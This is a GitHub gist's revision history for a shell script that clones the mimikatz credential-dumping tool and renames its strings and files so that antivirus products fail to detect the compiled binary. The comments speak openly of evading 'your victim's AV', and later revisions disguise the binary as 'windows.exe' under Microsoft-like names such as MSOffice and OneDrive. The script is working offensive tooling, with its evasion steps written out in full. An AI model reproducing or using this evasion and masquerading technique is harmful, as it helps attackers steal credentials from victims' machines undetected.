Skip to content

Instantly share code, notes, and snippets.

@imaibou

imaibou/mimikatz_obfuscator.sh

Last active June 24, 2025 11:18
Show Gist options
  • Save imaibou/92feba3455bf173f123fbe50bbe80781 to your computer and use it in GitHub Desktop.
Save imaibou/92feba3455bf173f123fbe50bbe80781 to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. imaibou revised this gist Nov 8, 2016. 1 changed file with 3 additions and 4 deletions.
    7 changes: 3 additions & 4 deletions mimikatz_obfuscator.sh
    View file
    Original file line number Diff line number Diff line change
    @@ -3,16 +3,15 @@
    # so removing them from the project before compiling gets us past most of the AV solutions.
    # We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
    # but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
    # The final binary's name will be windows.exe

    git clone https://github.com/gentilkiwi/mimikatz.git windows
    mv windows/mimikatz windows/windows
    find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/Mimikatz/Windows/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/DELPY/GATES/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/Benjamin/Bill/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/[email protected]/billgates@hotmail.com/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/DELPY/James/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/Benjamin/Troy/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/[email protected]/jtroy@hotmail.com/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/creativecommons/python/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/gentilkiwi/MSOffice/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/KIWI/ONEDRIVE/g'
  2. imaibou revised this gist Nov 8, 2016. 1 changed file with 18 additions and 18 deletions.
    36 changes: 18 additions & 18 deletions mimikatz_obfuscator.sh
    View file
    Original file line number Diff line number Diff line change
    @@ -3,26 +3,26 @@
    # so removing them from the project before compiling gets us past most of the AV solutions.
    # We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
    # but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
    # I replaced "mimikatz" by "kartoffel" (no, I'm not germain), I recommand you change that so that Kartoffel doesn't get flaged by AVs.
    # The final binary's name will be windows.exe

    git clone https://github.com/gentilkiwi/mimikatz.git kartoffel
    mv kartoffel/mimikatz kartoffel/kartoffel
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/mimikatz/kartoffel/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/KARTOFFEL/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/Mimikatz/Kartoffel/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/DELPY/DOE/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/Benjamin/John/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/[email protected]/johndoe@example.com/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/creativecommons/python/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/gentilkiwi/hoyhayhay/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/KIWI/MANGO/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/Kiwi/Mango/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/kiwi/mango/g'
    find kartoffel/ -type f -name '*mimikatz*' | while read FILE ; do
    newfile="$(echo ${FILE} |sed -e 's/mimikatz/kartoffel/g')";
    git clone https://github.com/gentilkiwi/mimikatz.git windows
    mv windows/mimikatz windows/windows
    find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/Mimikatz/Windows/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/DELPY/GATES/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/Benjamin/Bill/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/[email protected]/billgates@hotmail.com/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/creativecommons/python/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/gentilkiwi/MSOffice/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/KIWI/ONEDRIVE/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/Kiwi/Onedrive/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/kiwi/onedrive/g'
    find windows/ -type f -name '*mimikatz*' | while read FILE ; do
    newfile="$(echo ${FILE} |sed -e 's/mimikatz/windows/g')";
    mv "${FILE}" "${newfile}";
    done
    find kartoffel/ -type f -name '*kiwi*' | while read FILE ; do
    newfile="$(echo ${FILE} |sed -e 's/kiwi/mango/g')";
    find windows/ -type f -name '*kiwi*' | while read FILE ; do
    newfile="$(echo ${FILE} |sed -e 's/kiwi/onedrive/g')";
    mv "${FILE}" "${newfile}";
    done
  3. imaibou revised this gist Nov 8, 2016. No changes.
  4. imaibou revised this gist Nov 8, 2016. 1 changed file with 6 additions and 1 deletion.
    7 changes: 6 additions & 1 deletion mimikatz_obfuscator.sh
    View file
    Original file line number Diff line number Diff line change
    @@ -1,4 +1,9 @@
    # This script downloads and slightly "obfuscates" the mimikatz project. Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "[email protected]" ..., so removing them from the project before compiling gets us past most of the AV solutions. We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ...., but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program. I replaced "mimikatz" by "kartoffel" (no, I'm not germain), I recommand you change that so that Kartoffel doesn't get flaged by AVs.
    # This script downloads and slightly "obfuscates" the mimikatz project.
    # Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "[email protected]" ...,
    # so removing them from the project before compiling gets us past most of the AV solutions.
    # We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
    # but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
    # I replaced "mimikatz" by "kartoffel" (no, I'm not germain), I recommand you change that so that Kartoffel doesn't get flaged by AVs.

    git clone https://github.com/gentilkiwi/mimikatz.git kartoffel
    mv kartoffel/mimikatz kartoffel/kartoffel
  5. imaibou created this gist Nov 8, 2016.
    23 changes: 23 additions & 0 deletions mimikatz_obfuscator.sh
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,23 @@
    # This script downloads and slightly "obfuscates" the mimikatz project. Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "[email protected]" ..., so removing them from the project before compiling gets us past most of the AV solutions. We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ...., but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program. I replaced "mimikatz" by "kartoffel" (no, I'm not germain), I recommand you change that so that Kartoffel doesn't get flaged by AVs.

    git clone https://github.com/gentilkiwi/mimikatz.git kartoffel
    mv kartoffel/mimikatz kartoffel/kartoffel
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/mimikatz/kartoffel/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/KARTOFFEL/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/Mimikatz/Kartoffel/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/DELPY/DOE/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/Benjamin/John/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/[email protected]/[email protected]/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/creativecommons/python/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/gentilkiwi/hoyhayhay/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/KIWI/MANGO/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/Kiwi/Mango/g'
    find kartoffel/ -type f -print0 | xargs -0 sed -i 's/kiwi/mango/g'
    find kartoffel/ -type f -name '*mimikatz*' | while read FILE ; do
    newfile="$(echo ${FILE} |sed -e 's/mimikatz/kartoffel/g')";
    mv "${FILE}" "${newfile}";
    done
    find kartoffel/ -type f -name '*kiwi*' | while read FILE ; do
    newfile="$(echo ${FILE} |sed -e 's/kiwi/mango/g')";
    mv "${FILE}" "${newfile}";
    done